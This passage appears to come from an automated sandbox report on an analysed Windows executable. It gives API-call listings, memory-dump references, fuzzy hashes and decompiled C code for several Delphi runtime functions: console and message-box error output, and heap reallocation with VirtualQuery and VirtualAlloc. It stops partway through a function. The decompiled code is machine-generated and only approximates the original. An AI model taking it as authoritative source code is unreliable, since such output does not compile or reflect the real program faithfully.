                                                                    0x004047e4
                                                                    0x004047e9
                                                                    0x004047ef
                                                                    0x004047fd
                                                                    0x0040480b
                                                                    0x0040481a
                                                                    0x0040481a
                                                                    0x00404832

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                    • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: 9@
                                                                    • API String ID: 3320372497-3209974744
                                                                    • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                    • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                    • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                    • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                                    0x0041f0fd
                                                                    0x0041f0fe
                                                                    0x0041f101
                                                                    0x0041f106
                                                                    0x0041f107
                                                                    0x0041f10c
                                                                    0x0041f10f
                                                                    0x0041f122
                                                                    0x0041f124
                                                                    0x0041f12c
                                                                    0x0041f1ca
                                                                    0x0041f1cf
                                                                    0x0041f1de
                                                                    0x0041f1f8
                                                                    0x0041f132
                                                                    0x0041f132
                                                                    0x0041f13c
                                                                    0x0041f15a
                                                                    0x0041f15c
                                                                    0x0041f16b
                                                                    0x0041f188
                                                                    0x0041f1a0
                                                                    0x0041f1ba
                                                                    0x0041f1ba
                                                                    0x0041f1ff
                                                                    0x0041f202
                                                                    0x0041f205
                                                                    0x0041f20d
                                                                    0x0041f218

                                                                    APIs
                                                                      • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                      • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                    • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                    • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                    • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 135118572-0
                                                                    • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                    • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                    • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                    • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                    0x00404464
                                                                    0x00404464
                                                                    0x00404464
                                                                    0x0040446c
                                                                    0x0040446e
                                                                    0x004044fc
                                                                    0x004044ff
                                                                    0x0040476c
                                                                    0x0040476d
                                                                    0x0040476e
                                                                    0x00404771
                                                                    0x00403d9c
                                                                    0x00403d9d
                                                                    0x00403d9e
                                                                    0x00403d9f
                                                                    0x00403da0
                                                                    0x00403da3
                                                                    0x00403da5
                                                                    0x00403dac
                                                                    0x00403db5
                                                                    0x00403dba
                                                                    0x00403ea1
                                                                    0x00403ea3
                                                                    0x00403eb6
                                                                    0x00403eb8
                                                                    0x00403eba
                                                                    0x00403ebc
                                                                    0x00403ec2
                                                                    0x00403ec6
                                                                    0x00403ec6
                                                                    0x00403ec9
                                                                    0x00403ec9
                                                                    0x00403ed2
                                                                    0x00403ed9
                                                                    0x00403ed9
                                                                    0x00403ea5
                                                                    0x00403ea5
                                                                    0x00403eaa
                                                                    0x00403eaa
                                                                    0x00403dc0
                                                                    0x00403dc9
                                                                    0x00403dcf
                                                                    0x00403dcb
                                                                    0x00403dcb
                                                                    0x00403dcb
                                                                    0x00403ddb
                                                                    0x00403dea
                                                                    0x00403df7
                                                                    0x00403e67
                                                                    0x00403e6e
                                                                    0x00403e70
                                                                    0x00403e72
                                                                    0x00403e74
                                                                    0x00403e7a
                                                                    0x00403e7e
                                                                    0x00403e7e
                                                                    0x00403e81
                                                                    0x00403e81
                                                                    0x00403e91
                                                                    0x00403e98
                                                                    0x00403e98
                                                                    0x00403df9
                                                                    0x00403df9
                                                                    0x00403e05
                                                                    0x00403e0b
                                                                    0x00000000
                                                                    0x00403e0d
                                                                    0x00403e1e
                                                                    0x00403e22
                                                                    0x00403e24
                                                                    0x00403e24
                                                                    0x00403e3a
                                                                    0x00000000
                                                                    0x00403e52
                                                                    0x00403e54
                                                                    0x00403e57
                                                                    0x00403e60
                                                                    0x00403e63
                                                                    0x00403e63
                                                                    0x00403e3a
                                                                    0x00403e0b
                                                                    0x00403df7
                                                                    0x00403ee7
                                                                    0x00404777
                                                                    0x00404777
                                                                    0x00404779
                                                                    0x00404779
                                                                    0x00404505
                                                                    0x00404507
                                                                    0x0040450a
                                                                    0x0040450b
                                                                    0x0040450e
                                                                    0x00404511
                                                                    0x00404514
                                                                    0x00404516
                                                                    0x00404517
                                                                    0x0040462c
                                                                    0x0040462f
                                                                    0x00404631
                                                                    0x00404724
                                                                    0x0040472f
                                                                    0x00404736
                                                                    0x00404738
                                                                    0x0040473b
                                                                    0x00404740
                                                                    0x00404741
                                                                    0x00404743
                                                                    0x00000000
                                                                    0x00404745
                                                                    0x00404745
                                                                    0x0040474b
                                                                    0x0040474d
                                                                    0x0040474d
                                                                    0x00404750
                                                                    0x00404758
                                                                    0x0040475f
                                                                    0x0040476a
                                                                    0x0040476a
                                                                    0x00404637
                                                                    0x00404637
                                                                    0x0040463a
                                                                    0x0040463d
                                                                    0x0040463f
                                                                    0x00000000
                                                                    0x00404645
                                                                    0x00404645
                                                                    0x0040464c
                                                                    0x004046a9
                                                                    0x004046a9
                                                                    0x004046ae
                                                                    0x004046b4
                                                                    0x004046b9
                                                                    0x004046ba
                                                                    0x004046ba
                                                                    0x004046c6
                                                                    0x004046d7
                                                                    0x004046dd
                                                                    0x004046dd
                                                                    0x004046df
                                                                    0x004046ec
                                                                    0x004046f3
                                                                    0x004046f7
                                                                    0x004046f9
                                                                    0x004046ff
                                                                    0x00404701
                                                                    0x00404703
                                                                    0x00404703
                                                                    0x004046e1
                                                                    0x004046e1
                                                                    0x004046e5
                                                                    0x004046e5
                                                                    0x00404708
                                                                    0x00404708
                                                                    0x0040470a
                                                                    0x0040470d
                                                                    0x00404714
                                                                    0x00404716
                                                                    0x0040471a
                                                                    0x0040464e
                                                                    0x0040464e
                                                                    0x00404653
                                                                    0x0040465b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040465d
                                                                    0x0040465f
                                                                    0x00404666
                                                                    0x00000000
                                                                    0x00404668
                                                                    0x0040466c
                                                                    0x00404671
                                                                    0x00404672
                                                                    0x00404678
                                                                    0x00404680
                                                                    0x00404686
                                                                    0x0040468b
                                                                    0x0040468c
                                                                    0x00000000
                                                                    0x0040468c
                                                                    0x00404680
                                                                    0x00000000
                                                                    0x00404666
                                                                    0x00404695
                                                                    0x00404698
                                                                    0x0040469b
                                                                    0x0040469d
                                                                    0x0040471d
                                                                    0x0040471d
                                                                    0x00000000
                                                                    0x0040469f
                                                                    0x0040469f
                                                                    0x004046a2
                                                                    0x004046a5
                                                                    0x004046a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004046a7
                                                                    0x0040469d
                                                                    0x0040464c
                                                                    0x0040463f
                                                                    0x0040451d
                                                                    0x00404520
                                                                    0x00404522
                                                                    0x0040452c
                                                                    0x00404532
                                                                    0x00404549
                                                                    0x00404549
                                                                    0x00404555
                                                                    0x0040455b
                                                                    0x0040455d
                                                                    0x00404564
                                                                    0x00404566
                                                                    0x0040456b
                                                                    0x00404573
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404575
                                                                    0x00404577
                                                                    0x0040457e
                                                                    0x00000000
                                                                    0x00404580
                                                                    0x00404583
                                                                    0x00404588
                                                                    0x0040458e
                                                                    0x00404596
                                                                    0x0040459b
                                                                    0x004045a0
                                                                    0x00000000
                                                                    0x004045a0
                                                                    0x00404596
                                                                    0x00000000
                                                                    0x0040457e
                                                                    0x004045a9
                                                                    0x004045a9
                                                                    0x004045a9
                                                                    0x004045ae
                                                                    0x004045b1
                                                                    0x004045b3
                                                                    0x004045b6
                                                                    0x004045b9
                                                                    0x004045c4
                                                                    0x004045c6
                                                                    0x004045c9
                                                                    0x004045cb
                                                                    0x004045cd
                                                                    0x004045d3
                                                                    0x004045d5
                                                                    0x004045d5
                                                                    0x004045bb
                                                                    0x004045be
                                                                    0x004045be
                                                                    0x004045da
                                                                    0x004045e0
                                                                    0x004045e4
                                                                    0x004045ea
                                                                    0x004045f1
                                                                    0x004045f1
                                                                    0x004045f6
                                                                    0x00404603
                                                                    0x00404534
                                                                    0x00404534
                                                                    0x0040453a
                                                                    0x00404604
                                                                    0x00404608
                                                                    0x0040460d
                                                                    0x0040460f
                                                                    0x00404611
                                                                    0x00404619
                                                                    0x00404620
                                                                    0x00404625
                                                                    0x00404625
                                                                    0x0040462b
                                                                    0x00404540
                                                                    0x00404540
                                                                    0x00404545
                                                                    0x00404547
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404547
                                                                    0x0040453a
                                                                    0x00404524
                                                                    0x00404524
                                                                    0x00404528
                                                                    0x00404528
                                                                    0x00404522
                                                                    0x00404517
                                                                    0x00404474
                                                                    0x00404474
                                                                    0x00404476
                                                                    0x0040447a
                                                                    0x0040447d
                                                                    0x0040447f
                                                                    0x004044b8
                                                                    0x004044bc
                                                                    0x004044bd
                                                                    0x004044bf
                                                                    0x004044c1
                                                                    0x004044c3
                                                                    0x004044c6
                                                                    0x004044c8
                                                                    0x004044ca
                                                                    0x004044cf
                                                                    0x004044d1
                                                                    0x004044d3
                                                                    0x004044d9
                                                                    0x004044db
                                                                    0x004044db
                                                                    0x004044e2
                                                                    0x004044e2
                                                                    0x004044e5
                                                                    0x004044e7
                                                                    0x004044f0
                                                                    0x004044f5
                                                                    0x004044f5
                                                                    0x004044f7
                                                                    0x004044f8
                                                                    0x004044f9
                                                                    0x004044fa
                                                                    0x00404481
                                                                    0x00404481
                                                                    0x00404488
                                                                    0x0040448a
                                                                    0x00404490
                                                                    0x00404492
                                                                    0x00404494
                                                                    0x00404499
                                                                    0x0040449b
                                                                    0x0040449d
                                                                    0x0040449f
                                                                    0x004044a1
                                                                    0x004044ac
                                                                    0x004044b1
                                                                    0x004044b1
                                                                    0x004044b3
                                                                    0x004044b4
                                                                    0x004044b5
                                                                    0x0040448c
                                                                    0x0040448c
                                                                    0x0040448d
                                                                    0x0040448e
                                                                    0x0040448e
                                                                    0x0040448a
                                                                    0x0040447f

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                    • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                    • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                    • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
